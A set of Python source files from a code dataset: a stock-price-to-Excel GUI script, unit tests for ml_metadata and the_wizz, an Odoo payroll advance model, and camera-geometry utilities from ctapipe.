type of data interval they would like \r\n\t\t# Create new root\r\n\t\troot4 = Tk()\r\n\t\troot4.title('Time and Data Interval')\r\n\t\tw4 = 550\r\n\t\th4 = 70 \r\n\t\troot4.geometry('%dx%d+%d+%d' % (w4, h4, x, y))\r\n\t\tapp = Frame(root4)\r\n\t\tapp.grid()\r\n\t\t\r\n\t\t#GUI 6: The years and type of data interval needed.\r\n\t\t#File_or_Manual_Entry_Yes = Radiobutton(text = \" Yes \", variable = Answer_Control, value = 'Y', indicatoron = 0, command = onclick).grid(row = 0, column = 10, columnspan = 1, sticky = W)\r\n\t\tTime_Interval_Answer = IntVar()\r\n\t\tData_Interval_Answer = StringVar()\r\n\t\t\r\n\t\tTime_Interval_instructions = Label(text = \"How many years of prices would you like?\")\r\n\t\tTime_Interval_instructions.grid(row = 0, column = 0, sticky = W)\r\n\t\tTime_Interval_Entry = Entry(textvariable = Time_Interval_Answer)\r\n\t\tTime_Interval_Entry.grid(row = 0, column = 1, sticky = W)\r\n\t\tData_Interval_instructions = Label(text = \"Choose your Price Type:\")\r\n\t\tData_Interval_instructions.grid(row = 2, column = 0, sticky = W) \r\n\t\tData_Interval_Radio_Button = Radiobutton(text = 'Daily', variable = Data_Interval_Answer, value = 'd', indicatoron = 0, command = onclick4).grid(row = 2, column =1,)\r\n\t\tData_Interval_Radio_Button = Radiobutton(text = 'Weekly', variable = Data_Interval_Answer, value = 'w', indicatoron = 0, command = onclick4).grid(row = 2, column =2, sticky = W)\r\n\t\tData_Interval_Radio_Button = Radiobutton(text = 'Monthly', variable = Data_Interval_Answer, value = 'm', indicatoron = 0, command = onclick4).grid(row = 2, column =3, sticky = W)\r\n\t\tData_Interval_Radio_Button = Radiobutton(text = 'Dividend', variable = Data_Interval_Answer, value = 'v', indicatoron = 0, command = onclick4).grid(row = 2, column =4, sticky = W)\r\n\t\r\n\t\t\r\n\t\troot4.mainloop()\r\n\t# Ask how many years of data needed\r\n\t\tYears_of_Data_Entry = 
Time_Interval_Answer.get()\r\n\t\tYears_of_Data = Years_of_Data_Entry\r\n\t\tYears_of_Data = int(Years_of_Data)\r\n\t# Data interval d, w, m, v\r\n\t\tdata_interval = Data_Interval_Answer.get()\r\n\t\tdata_interval = str(data_interval) \r\n\t\t\r\n\"\"\" Start Date and End Date for Stock Info \"\"\"\r\nprint(Years_of_Data)\r\nstart_of_interval = datetime.datetime(now.year - int(Years_of_Data), now.month, now.day)\r\nend_of_interval = datetime.datetime(now.year, now.month, now.day)\t\t\r\n\r\nprint(data_interval) \r\n\"\"\"Create DataFrame and Pull Daily Report Prices\"\"\"\r\ntry: \r\n\tif data_interval != 'v':\r\n\t\tdf = pd.io.data.get_data_yahoo(list, start = start_of_interval, end = end_of_interval, interval = data_interval)['Adj Close']\r\n\telse:\r\n\t\tdf = pd.io.data.get_data_yahoo(list, start = start_of_interval, end = end_of_interval, interval = data_interval)\r\nexcept:\r\n\troot_error = Tk() \r\n\troot_error.title('Error')\r\n\tw_error = 700 \r\n\th_error = 50 \r\n\troot_error.geometry('%dx%d+%d+%d' % (w_error, h_error, x, y))\r\n\tapp = Frame(root_error)\r\n\tapp.grid()\r\n\tError_Return = Label(text = \"There was an error. No information was pulled. If using just today's prices, they may not be available yet. Try again later.\")\r\n\tError_Return.grid(row = 1, column = 1, sticky = W) \r\n\troot_error.mainloop() \r\n\tsys.exit(\"Error Message\") \r\n\r\nif Manual == \"D\":\r\n\turl = \"http://fundresearch.fidelity.com/mutual-funds/fidelity-funds-daily-pricing-yields/download\"\r\n\tCSV_Import = urllib.request.urlopen(url).read() \r\n\tCSV = pd.read_csv(url, skiprows=4) \r\n\t\r\n\tprint(CSV) \r\n\t#CSV = pd.read_csv(CSV_Import, skiprows=4) \r\n \r\n\"\"\"Create Returns\"\"\"\r\nif data_interval != 'v':\r\n\trets = df.pct_change()\r\n\r\n\"\"\" Create Correlation \"\"\"\r\nif data_interval != 'v':\r\n if File_or_Manual == \"Y\":\r\n corr = rets.corr()\r\n elif Manual == \"S\":\r\n print(\"No Correlation\")\r\n elif Manual == \"L\":\r\n corr = rets.corr()\r\n elif Manual == \"D\":\r\n corr = rets.corr() \r\n else:\r\n print(\"No Correlation\")\r\n\r\nif data_interval == \"m\":\r\n\tdf = df.resample('MS', how='mean') \r\n\t \r\n\r\nif data_interval == \"w\":\r\n\tdf = df.resample('W', how='mean')\r\n\tprint(df.head())\r\n\"\"\" Create new Excel file \"\"\"\r\n\r\nroot6 = Tk()\r\nroot6.title('Create New File')\r\nw6 = 300\r\nh6 = 80 \r\nroot6.geometry('%dx%d+%d+%d' % (w6, h6, x, y))\r\napp = Frame(root6)\r\napp.grid()\r\nlabel6 = Label(app, text = '')\r\nlabel6.grid()\r\nFile_Name = StringVar() \r\nNew_File_Input_Instructions = Label(text = \"Enter New File Name:\")\r\nNew_File_Input_Instructions.grid(row = 2, column = 0, sticky = W)\r\nNew_File_Input_Entry = Entry(textvariable = File_Name)\r\nNew_File_Input_Entry.grid(row = 2, column = 1, columnspan = 2, sticky = E)\r\nSubmit_Button2 = Button(text = 'Submit', command = onclick6)\r\nSubmit_Button2.grid(row = 3, column = 1, sticky = N+S+E+W) \r\nSubmit_Button2.config(bd = 5) \r\nBrowse_Button = Button(text = \"Browse\", command = file_onclick2) \r\nBrowse_Button.grid(row = 3, column = 2, sticky = N+S+E+W)\r\nBrowse_Button.config(bd = 5) \r\nroot6.mainloop() \r\n \r\nFile = str(File_Name.get()) \r\nif manual_file_entry == 1:\r\n\twriter = ExcelWriter(str(File) + '.xlsx') \r\nelse:\r\n\twriter = ExcelWriter(new_file) \r\n\r\n\"\"\" Write info to Excel Sheet \"\"\"\r\n\r\n# Write Prices to Excel Sheet \r\nif File_or_Manual == \"Y\":\r\n\tdf.to_excel(writer, 'Prices')\r\n\r\n# Check to see if it is dividend info, because that is 
written to excel like a list of stocks even if it is a single stock\r\nif data_interval != 'v':\r\n\tif Manual == \"S\":\r\n\t\tdf.to_frame(name=str(list)).to_excel(writer, 'Prices') \r\n\telif Manual == \"L\":\r\n\t\tdf.to_excel(writer, 'Prices')\r\n\telse:\r\n\t\tdf.to_excel(writer, 'Prices')\r\nelse:\r\n\tdf.to_excel(writer, 'Prices') \r\n\r\n# Write Returns to Excel Sheet \r\nif data_interval != 'v':\r\n\tif File_or_Manual == \"Y\":\r\n\t\trets.to_excel(writer,'Returns')\r\n\telif Manual == \"S\":\r\n\t\trets.to_frame(name=str(list)).to_excel(writer, 'Returns') \r\n\telif Manual == \"L\":\r\n\t\trets.to_excel(writer,'Returns')\r\n\telse:\r\n\t\trets.to_excel(writer, 'Returns') \r\n\r\n# Write Correlation to Excel Sheet \r\nif data_interval != 'v':\r\n\tif File_or_Manual == \"Y\":\r\n\t\tcorr.to_excel(writer,'corr')\r\n\telif Manual == \"S\":\r\n\t\tprint(\"no correlation\")\r\n\telif Manual == \"L\":\r\n\t\tcorr.to_excel(writer,'corr')\r\n\telse:\r\n\t\tprint(\"no correlation\")\r\nelse:\r\n\twriter.close() \r\n\r\n\r\n\r\n# Saves the Excel sheet \r\nwriter.save() \r\n\r\n\"\"\" Start the file in Excel \"\"\" \r\nif manual_file_entry == 1:\r\n\tos.startfile(File + '.xlsx')\r\nelse:\r\n\tos.startfile(File) \r\n \r\n \r\nprint(df) \r\n\r\n\r\n","sub_path":"YahooStockPrices.py","file_name":"YahooStockPrices.py","file_ext":"py","file_size_in_byte":15264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"312263827","text":"# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for ml_metadata.metadata_store.metadata_store.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom absl.testing import absltest\nfrom ml_metadata.metadata_store import metadata_store\nfrom ml_metadata.proto import metadata_store_pb2\nfrom tensorflow.python.framework import errors\n\n\ndef _get_metadata_store():\n connection_config = metadata_store_pb2.ConnectionConfig()\n connection_config.sqlite.SetInParent()\n return metadata_store.MetadataStore(connection_config)\n\n\ndef _create_example_artifact_type():\n artifact_type = metadata_store_pb2.ArtifactType()\n artifact_type.name = \"test_type_2\"\n artifact_type.properties[\"foo\"] = metadata_store_pb2.INT\n artifact_type.properties[\"bar\"] = metadata_store_pb2.STRING\n artifact_type.properties[\"baz\"] = metadata_store_pb2.DOUBLE\n return artifact_type\n\n\ndef _create_example_execution_type():\n execution_type = metadata_store_pb2.ExecutionType()\n execution_type.name = \"test_type_2\"\n execution_type.properties[\"foo\"] = metadata_store_pb2.INT\n execution_type.properties[\"bar\"] = metadata_store_pb2.STRING\n return execution_type\n\n\n\n\nclass MetadataStoreTest(absltest.TestCase):\n\n def test_put_artifact_type_get_artifact_type(self):\n store = _get_metadata_store()\n artifact_type = _create_example_artifact_type()\n\n type_id = store.put_artifact_type(artifact_type)\n artifact_type_result = 
store.get_artifact_type(\"test_type_2\")\n self.assertEqual(artifact_type_result.id, type_id)\n self.assertEqual(artifact_type_result.name, \"test_type_2\")\n self.assertEqual(artifact_type_result.properties[\"foo\"],\n metadata_store_pb2.INT)\n self.assertEqual(artifact_type_result.properties[\"bar\"],\n metadata_store_pb2.STRING)\n self.assertEqual(artifact_type.properties[\"baz\"], metadata_store_pb2.DOUBLE)\n\n def test_put_artifacts_get_artifacts_by_id(self):\n store = _get_metadata_store()\n artifact_type = _create_example_artifact_type()\n type_id = store.put_artifact_type(artifact_type)\n artifact = metadata_store_pb2.Artifact()\n artifact.type_id = type_id\n artifact.properties[\"foo\"].int_value = 3\n artifact.properties[\"bar\"].string_value = \"Hello\"\n [artifact_id] = store.put_artifacts([artifact])\n [artifact_result] = store.get_artifacts_by_id([artifact_id])\n self.assertEqual(artifact_result.properties[\"bar\"].string_value, \"Hello\")\n self.assertEqual(artifact_result.properties[\"foo\"].int_value, 3)\n\n def test_put_artifacts_get_artifacts(self):\n store = _get_metadata_store()\n artifact_type = _create_example_artifact_type()\n type_id = store.put_artifact_type(artifact_type)\n artifact_0 = metadata_store_pb2.Artifact()\n artifact_0.type_id = type_id\n artifact_0.properties[\"foo\"].int_value = 3\n artifact_0.properties[\"bar\"].string_value = \"Hello\"\n artifact_1 = metadata_store_pb2.Artifact()\n artifact_1.type_id = type_id\n\n [artifact_id_0,\n artifact_id_1] = store.put_artifacts([artifact_0, artifact_1])\n artifact_result = store.get_artifacts()\n if artifact_result[0].id == artifact_id_0:\n [artifact_result_0, artifact_result_1] = artifact_result\n else:\n [artifact_result_1, artifact_result_0] = artifact_result\n self.assertEqual(artifact_result_0.id, artifact_id_0)\n self.assertEqual(artifact_result_0.properties[\"bar\"].string_value, \"Hello\")\n self.assertEqual(artifact_result_0.properties[\"foo\"].int_value, 3)\n self.assertEqual(artifact_result_1.id, artifact_id_1)\n\n def test_update_artifact_get_artifact(self):\n store = _get_metadata_store()\n artifact_type = _create_example_artifact_type()\n type_id = store.put_artifact_type(artifact_type)\n artifact = metadata_store_pb2.Artifact()\n artifact.type_id = type_id\n artifact.properties[\"bar\"].string_value = \"Hello\"\n\n [artifact_id] = store.put_artifacts([artifact])\n artifact_2 = metadata_store_pb2.Artifact()\n artifact_2.CopyFrom(artifact)\n artifact_2.id = artifact_id\n artifact_2.properties[\"foo\"].int_value = artifact_id\n artifact_2.properties[\"bar\"].string_value = \"Goodbye\"\n [artifact_id_2] = store.put_artifacts([artifact_2])\n self.assertEqual(artifact_id, artifact_id_2)\n\n [artifact_result] = store.get_artifacts_by_id([artifact_id])\n self.assertEqual(artifact_result.properties[\"bar\"].string_value, \"Goodbye\")\n self.assertEqual(artifact_result.properties[\"foo\"].int_value, artifact_id)\n\n def test_create_artifact_with_type_get_artifacts_by_id(self):\n store = _get_metadata_store()\n artifact_type = _create_example_artifact_type()\n artifact = metadata_store_pb2.Artifact()\n artifact.properties[\"foo\"].int_value = 3\n artifact.properties[\"bar\"].string_value = \"Hello\"\n artifact_id = store.create_artifact_with_type(artifact, artifact_type)\n [artifact_result] = store.get_artifacts_by_id([artifact_id])\n self.assertEqual(artifact_result.properties[\"bar\"].string_value, \"Hello\")\n self.assertEqual(artifact_result.properties[\"foo\"].int_value, 3)\n\n def 
test_put_execution_type_get_execution_type(self):\n store = _get_metadata_store()\n execution_type = metadata_store_pb2.ExecutionType()\n execution_type.name = \"test_type_2\"\n execution_type.properties[\"foo\"] = metadata_store_pb2.INT\n execution_type.properties[\"bar\"] = metadata_store_pb2.STRING\n type_id = store.put_execution_type(execution_type)\n execution_type_result = store.get_execution_type(\"test_type_2\")\n self.assertEqual(execution_type_result.id, type_id)\n self.assertEqual(execution_type_result.name, \"test_type_2\")\n\n def test_put_executions_get_executions_by_id(self):\n store = _get_metadata_store()\n execution_type = metadata_store_pb2.ExecutionType()\n execution_type.name = \"test_type_2\"\n execution_type.properties[\"foo\"] = metadata_store_pb2.INT\n execution_type.properties[\"bar\"] = metadata_store_pb2.STRING\n type_id = store.put_execution_type(execution_type)\n execution = metadata_store_pb2.Execution()\n execution.type_id = type_id\n execution.properties[\"foo\"].int_value = 3\n execution.properties[\"bar\"].string_value = \"Hello\"\n [execution_id] = store.put_executions([execution])\n [execution_result] = store.get_executions_by_id([execution_id])\n self.assertEqual(execution_result.properties[\"bar\"].string_value, \"Hello\")\n self.assertEqual(execution_result.properties[\"foo\"].int_value, 3)\n\n def test_put_executions_get_executions(self):\n store = _get_metadata_store()\n execution_type = _create_example_execution_type()\n type_id = store.put_execution_type(execution_type)\n execution_0 = metadata_store_pb2.Execution()\n execution_0.type_id = type_id\n execution_0.properties[\"foo\"].int_value = 3\n execution_0.properties[\"bar\"].string_value = \"Hello\"\n execution_1 = metadata_store_pb2.Execution()\n execution_1.type_id = type_id\n execution_1.properties[\"foo\"].int_value = -9\n execution_1.properties[\"bar\"].string_value = \"Goodbye\"\n\n [execution_id_0,\n execution_id_1] = store.put_executions([execution_0, execution_1])\n\n execution_result = store.get_executions()\n self.assertLen(execution_result, 2)\n # Normalize the order of the results.\n if execution_result[0].id == execution_id_0:\n [execution_result_0, execution_result_1] = execution_result\n else:\n [execution_result_1, execution_result_0] = execution_result\n\n self.assertEqual(execution_result_0.id, execution_id_0)\n self.assertEqual(execution_result_0.properties[\"bar\"].string_value, \"Hello\")\n self.assertEqual(execution_result_0.properties[\"foo\"].int_value, 3)\n self.assertEqual(execution_result_1.id, execution_id_1)\n self.assertEqual(execution_result_1.properties[\"bar\"].string_value,\n \"Goodbye\")\n self.assertEqual(execution_result_1.properties[\"foo\"].int_value, -9)\n\n def test_update_execution_get_execution(self):\n store = _get_metadata_store()\n execution_type = metadata_store_pb2.ExecutionType()\n execution_type.name = \"test_type_2\"\n execution_type.properties[\"foo\"] = metadata_store_pb2.INT\n execution_type.properties[\"bar\"] = metadata_store_pb2.STRING\n type_id = store.put_execution_type(execution_type)\n execution = metadata_store_pb2.Execution()\n execution.type_id = type_id\n execution.properties[\"bar\"].string_value = \"Hello\"\n\n [execution_id] = store.put_executions([execution])\n execution_2 = metadata_store_pb2.Execution()\n execution_2.id = execution_id\n execution_2.type_id = type_id\n execution_2.properties[\"foo\"].int_value = 12\n execution_2.properties[\"bar\"].string_value = \"Goodbye\"\n [execution_id_2] = 
store.put_executions([execution_2])\n self.assertEqual(execution_id, execution_id_2)\n\n [execution_result] = store.get_executions_by_id([execution_id])\n self.assertEqual(execution_result.properties[\"bar\"].string_value, \"Goodbye\")\n self.assertEqual(execution_result.properties[\"foo\"].int_value, 12)\n\n def test_put_events_get_events(self):\n store = _get_metadata_store()\n execution_type = metadata_store_pb2.ExecutionType()\n execution_type.name = \"execution_type\"\n execution_type_id = store.put_execution_type(execution_type)\n execution = metadata_store_pb2.Execution()\n execution.type_id = execution_type_id\n [execution_id] = store.put_executions([execution])\n artifact_type = metadata_store_pb2.ArtifactType()\n artifact_type.name = \"artifact_type\"\n artifact_type_id = store.put_artifact_type(artifact_type)\n artifact = metadata_store_pb2.Artifact()\n artifact.type_id = artifact_type_id\n [artifact_id] = store.put_artifacts([artifact])\n\n event = metadata_store_pb2.Event()\n event.type = metadata_store_pb2.Event.DECLARED_OUTPUT\n event.artifact_id = artifact_id\n event.execution_id = execution_id\n store.put_events([event])\n [event_result] = store.get_events_by_artifact_ids([artifact_id])\n self.assertEqual(event_result.artifact_id, artifact_id)\n self.assertEqual(event_result.execution_id, execution_id)\n self.assertEqual(event_result.type,\n metadata_store_pb2.Event.DECLARED_OUTPUT)\n\n [event_result_2] = store.get_events_by_execution_ids([execution_id])\n self.assertEqual(event_result_2.artifact_id, artifact_id)\n self.assertEqual(event_result_2.execution_id, execution_id)\n self.assertEqual(event_result_2.type,\n metadata_store_pb2.Event.DECLARED_OUTPUT)\n\n def test_get_executions_by_id_empty(self):\n \"\"\"See b/122594744.\"\"\"\n store = _get_metadata_store()\n result = store.get_executions_by_id({})\n self.assertEmpty(result)\n\n\nif __name__ == \"__main__\":\n absltest.main()\n","sub_path":"ml_metadata/metadata_store/metadata_store_test.py","file_name":"metadata_store_test.py","file_ext":"py","file_size_in_byte":11250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"638291830","text":"\nfrom __future__ import division, print_function, absolute_import\n\nimport numpy as np\nimport h5py\nimport subprocess\nimport unittest\n\nimport stomp\n\nfrom the_wizz import pair_maker_utils\nfrom the_wizz import stomp_utils\n\n\nclass DummyArgs(object):\n\n def __init__(self):\n self.reference_ra_name = 'ra'\n self.reference_dec_name = 'dec'\n self.reference_redshift_name = 'z'\n self.reference_index_name = None\n\n self.unknown_ra_name = 'ra'\n self.unknown_dec_name = 'dec'\n self.unknown_index_name = 'id'\n\n self.z_min = 0.01\n self.z_max = 10.0\n\n self.n_randoms = 10\n self.output_hdf5_file = 'unittest_output.hdf5'\n\n\nclass TestPairMakerUtils(unittest.TestCase):\n\n def setUp(self):\n self.dummy_args = DummyArgs()\n self.stomp_map = stomp.Map(\n 'data/COSMOS_X_zCOSMOS_BRIGHT_excluded.map')\n self.stomp_map.InitializeRegions(8)\n (self.reference_vect, self.reference_id_array,\n self.reference_tree) = stomp_utils.load_reference_sample(\n 'data/zCOSMOS_BRIGHT_v3.5_spec_FLAG34_FLAG134.fits',\n self.stomp_map, self.dummy_args)\n self.unknown_tree = stomp_utils.load_unknown_sample(\n 'data/COSMOS_iband_2009_radecidstomp_regionzp_best.fits',\n self.stomp_map, self.dummy_args)\n\n def tearDown(self):\n subprocess.Popen('rm unittest_output.hdf5', shell=True)\n\n def test_raw_pair_finder_and_hdf5_creation(self):\n pair_finder = 
pair_maker_utils.RawPairFinder(\n self.unknown_tree, self.reference_vect,\n self.reference_id_array, self.reference_tree,\n self.stomp_map, self.dummy_args.output_hdf5_file, None,\n create_hdf5_file=True, input_args=self.dummy_args)\n\n def test_pair_maker_output(self):\n\n pair_finder = pair_maker_utils.RawPairFinder(\n self.unknown_tree, self.reference_vect, self.reference_id_array,\n self.reference_tree, self.stomp_map,\n self.dummy_args.output_hdf5_file, None, create_hdf5_file=True,\n input_args=self.dummy_args)\n pair_finder.find_pairs(100, 300)\n\n output_hdf5_file = h5py.File(self.dummy_args.output_hdf5_file, 'r')\n test_hdf5_file = h5py.File('data/unittest_output.hdf5')\n\n for reference_idx, reference_obj in enumerate(self.reference_vect):\n ref_grp = output_hdf5_file[\n 'data/%i' %\n self.reference_id_array[reference_idx]]\n scale_grp = output_hdf5_file[\n 'data/%i/kpc100t300' %\n self.reference_id_array[reference_idx]]\n ref_pair_id_array = scale_grp['ids'][...]\n ref_dist_weight_array = scale_grp['dist_weights'][...]\n\n test_grp = test_hdf5_file[\n 'data/%s' %\n self.reference_id_array[reference_idx]]\n test_pair_id_array = test_grp['kpc100t300/ids'][...]\n test_dist_weight_array = test_grp['kpc100t300/dist_weights'][...]\n if ref_pair_id_array.shape[0] != test_pair_id_array.shape[0]:\n print('Failed for reference id:',\n self.reference_id_array[reference_idx])\n self.assertEqual(ref_pair_id_array.shape, test_pair_id_array.shape)\n for ref_pair_id, test_pair_id, \\\n ref_dist_weight, test_dist_weight in \\\n zip(ref_pair_id_array, test_pair_id_array,\n ref_dist_weight_array, test_dist_weight_array):\n self.assertEqual(ref_pair_id, test_pair_id)\n self.assertAlmostEqual(ref_dist_weight, test_dist_weight)\n\n self.assertAlmostEqual(\n ref_grp.attrs['redshift'],\n test_grp.attrs['redshift'])\n self.assertAlmostEqual(\n scale_grp.attrs['unmasked_frac'],\n test_grp['kpc100t300'].attrs['unmasked_frac'])\n self.assertEqual(\n scale_grp.attrs['bin_resolution'],\n test_grp['kpc100t300'].attrs['bin_resolution'])\n self.assertAlmostEqual(\n scale_grp.attrs['area'],\n test_grp['kpc100t300'].attrs['area'])\n\n def test_pair_maker_with_randoms(self):\n\n random_tree = stomp_utils.create_random_data(\n self.dummy_args.n_randoms * self.unknown_tree.NPoints(),\n self.stomp_map)\n\n pair_finder = pair_maker_utils.RawPairFinder(\n self.unknown_tree, self.reference_vect, self.reference_id_array,\n self.reference_tree, self.stomp_map,\n self.dummy_args.output_hdf5_file, random_tree,\n create_hdf5_file=True, input_args=self.dummy_args)\n pair_finder.find_pairs(100, 300)\n\n output_hdf5_file = h5py.File(self.dummy_args.output_hdf5_file, 'r')\n data_grp = output_hdf5_file['data']\n n_random = data_grp.attrs['n_random_points']\n tot_area = data_grp.attrs['area']\n\n ref_random_sum = 0\n ref_area_sum = 0.\n for reference_idx, reference_obj in enumerate(self.reference_vect):\n scale_grp = output_hdf5_file[\n 'data/%i/kpc100t300' %\n self.reference_id_array[reference_idx]]\n ref_random_sum += scale_grp.attrs['n_random']\n ref_area_sum += scale_grp.attrs['area']\n self.assertAlmostEqual(\n (n_random / tot_area) /\n (ref_random_sum / ref_area_sum) - 1,\n 0.0, places=2)\n\n\nif __name__ == \"__main__\":\n\n unittest.main()\n","sub_path":"tests/test_pair_maker_utils.py","file_name":"test_pair_maker_utils.py","file_ext":"py","file_size_in_byte":5521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"369927212","text":"# -*- coding: utf-8 -*-\n\nimport 
odoo.addons.decimal_precision as dp\nfrom odoo import models, fields, api, _\nfrom odoo.addons.kzm_base.controllers.tools import remove_accent\n\n\nclass hr_avance(models.Model):\n _name = 'hr.avance'\n _description = 'Avances'\n\n @api.onchange('name')\n def _onchange_name(self) :\n if self.name and not self.code:\n self.code = remove_accent(self.name.strip().replace(' ','_')).upper()\n\n @api.one\n @api.depends('rate_type')\n def _compute_rates(self):\n if self.rate_type == 'imp':\n self.rate_patronale = 100\n self.rate_salariale = 0\n else:\n self.rate_patronale = 0\n self.rate_salariale = 100\n\n rate_type = fields.Selection([\n ('exo', 'Exonoré'),\n ('imp', 'Imposable'),\n ], string=u'Exonération', required=True, default='exo')\n\n sequence = fields.Integer(string=u'Séquence', default=0)\n code = fields.Char(string=u'Code', size=64, required=True)\n name = fields.Char(string=u'Nom', size=64, required=True)\n rate_salariale = fields.Float(\n string=u'Taux',\n digits=dp.get_precision('Account'),\n compute='_compute_rates',\n store=True,\n )\n rate_patronale = fields.Float(\n string=u'Taux',\n digits=dp.get_precision('Account'),\n compute='_compute_rates',\n store=True,\n )\n plafond_salariale = fields.Float(\n string=u'Plafond exonération',\n digits=dp.get_precision('Account'),\n required=True,\n default=0)\n plafond_patronale = fields.Float(\n string=u'Plafond taxable',\n digits=dp.get_precision('Account'),\n required=True,\n default=0)\n contribution_id = fields.Many2one(\n 'hr.contribution.register', string=u'Contribution',)\n\n plafond_salariale_type = fields.Selection([\n ('fix', 'Fixe'),\n ('rate', 'Taux sur la base'),\n ], string=u'Type du plafond salarial',)\n\n plafond_patronale_type = fields.Selection([\n ('fix', 'Fixe'),\n ('rate', 'Taux sur la base'),\n ], string=u'Type de plafond patronale',)\n\n show_on_payslip = fields.Selection([\n ('never', 'Jamais'),\n ('ifnotnull', 'Si différent du zéro'),\n ('always', 'Toujours'),\n ], string=u'Affichage sur les bulletins', required=True, default='ifnotnull')\n\n\n show_on_ledger = fields.Selection([\n ('never', 'Jamais'),\n ('ifnotnull', 'Si différent du zéro'),\n ('always', 'Toujours'),\n ], string=u'Affichage dans le livre de paie', required=True, default='ifnotnull')\n\n is_retained = fields.Boolean(\n string=u'Est une base de l\\'IR', default=True)\n can_reset = fields.Boolean(string=u'Peut être réinitialisé', default=False)\n can_request = fields.Boolean(string=u'Peut être demandé', default=False)\n instant_move = fields.Boolean(string=u'Générer l\\'écriture comptable instantanément', default=True)\n\n analytic_account_id = fields.Many2one(\n 'account.analytic.account', string=u'Compte analytique',)\n account_tax_id = fields.Many2one('account.tax', string=u'Code TVA',)\n account_debit = fields.Many2one(\n 'account.account', string=u'Compte du débit')\n account_credit = fields.Many2one(\n 'account.account', string=u'Compte du crédit')\n\n interest_rate = fields.Float(\n string=u'Taux d\\'intérêt', digits=dp.get_precision('Account'), default=0)\n\n csv_erase = fields.Boolean(string=u'Écraser les données par les données du fichier CSV', default=False,)\n export_ok = fields.Boolean(string=u'Export/Import CSV', default=True,)\n active = fields.Boolean(string=u'Actif', default=True, )\n\n @api.model\n def create(self, vals):\n avance_id = super(hr_avance, self).create(vals)\n self.env['hr.axe'].create({'avance_id': avance_id.id})\n return avance_id\n\n @api.multi\n def write(self, vals):\n res = super(hr_avance, self).write(vals)\n 
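# re-sync the companion hr.axe records after every write, creating one if none exists yet\n        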
for avance in self:\n axes = self.env['hr.axe'].search(\n [('avance_id', '=', avance.id)])\n if axes:\n for axe in axes:\n axe.sudo().write({'avance_id': avance.id})\n else:\n axes.create({'avance_id': avance.id})\n return res\n\n @api.multi\n def unlink(self):\n for avance in self:\n axes = self.env['hr.axe'].search(\n [('avance_id', '=', avance.id)])\n if axes:\n for axe in axes:\n axe.unlink()\n return super(hr_avance, self).unlink()\n","sub_path":"l10n_ma_hr_payroll/models/avance.py","file_name":"avance.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"158000265","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"Utilities for reading or working with Camera geometry files\n\nTODO:\n-----\n\n - don't use `namedtuple` for CameraGeometry, since it's immutable and thus is\n pass-by-value (which could be slow).\n\n\"\"\"\nfrom collections import namedtuple\n\nimport numpy as np\nfrom astropy import units as u\nfrom astropy.table import Table\nfrom scipy.spatial import cKDTree as KDTree\n\nfrom .files import get_file_type\nfrom ctapipe.utils.datasets import get_path\n\n\n__all__ = ['CameraGeometry',\n 'get_camera_geometry',\n 'load_camera_geometry_from_file',\n 'make_rectangular_camera_geometry',\n 'find_neighbor_pixels', 'guess_camera_geometry',\n ]\n\n\n# dictionary to convert number of pixels to camera type for use in\n# guess_camera_geometry\n_npix_to_type = {2048: ('SST', 'rectangular'),\n 1141: ('MST', 'hexagonal'),\n 1855: ('LST', 'hexagonal'),\n 11328: ('SST', 'rectangular')}\n\n\nCameraGeometry = namedtuple(\"CameraGeometry\",\n ['cam_id', 'pix_id',\n 'pix_x', 'pix_y',\n 'pix_area',\n 'neighbors',\n 'pix_type'])\n\"\"\"Camera geometry.\n\nTODO: describe a bit what this is ...\n\"\"\"\n\n\ndef find_neighbor_pixels(pix_x, pix_y, rad):\n \"\"\"use a KD-Tree to quickly find nearest neighbors of the pixels in a\n camera. 
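 Lookups on the KD-Tree typically cost O(log n) per pixel, so this stays fast even for large cameras. 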
This function can be used to find the neighbor pixels if\n    they are not already present in a camera geometry file.\n\n    Parameters\n    ----------\n    pix_x : array_like\n        x position of each pixel\n    pix_y : array_like\n        y position of each pixel\n    rad : float\n        radius to consider as neighbor; it should be slightly larger\n        than the pixel diameter.\n\n    Returns\n    -------\n    array of neighbor indices in a list for each pixel\n\n    \"\"\"\n\n    points = np.array([pix_x, pix_y]).T\n    indices = np.arange(len(pix_x))\n    kdtree = KDTree(points)\n    neighbors = [kdtree.query_ball_point(p, r=rad) for p in points]\n    for nn, ii in zip(neighbors, indices):\n        nn.remove(ii)  # get rid of the pixel itself\n    return neighbors\n\n\ndef guess_camera_type(npix):\n    global _npix_to_type\n    return _npix_to_type.get(npix, ('unknown', 'hexagonal'))\n\n\n@u.quantity_input\ndef guess_camera_geometry(pix_x: u.m, pix_y: u.m):\n    \"\"\" returns a CameraGeometry filled in from just the x,y positions \"\"\"\n\n    rad = 0.5 * \\\n        np.sqrt((pix_x[1] - pix_x[0]) ** 2 + (pix_y[1] - pix_y[0]) ** 2)\n\n    cam_id, pix_type = guess_camera_type(len(pix_x))\n\n    return CameraGeometry(cam_id=cam_id,\n                          pix_id=np.arange(len(pix_x)),\n                          pix_x=pix_x,\n                          pix_y=pix_y,\n                          pix_area=np.pi * np.ones_like(pix_x) * rad ** 2,\n                          neighbors=find_neighbor_pixels(pix_x.value, pix_y.value,\n                                                         rad.value + 0.01),\n                          pix_type=pix_type)\n\n\ndef get_camera_geometry(instrument_name, cam_id, recalc_neighbors=True):\n    \"\"\"Helper function to provide the camera geometry definition for a\n    camera by name.\n\n    Parameters\n    ----------\n    instrument_name : {'hess'}\n        name of instrument\n    cam_id : int\n        identifier of camera, in case of multiple versions\n    recalc_neighbors : bool\n        if True, recalculate the neighbor pixel list, otherwise\n        use what is in the file\n\n    Returns\n    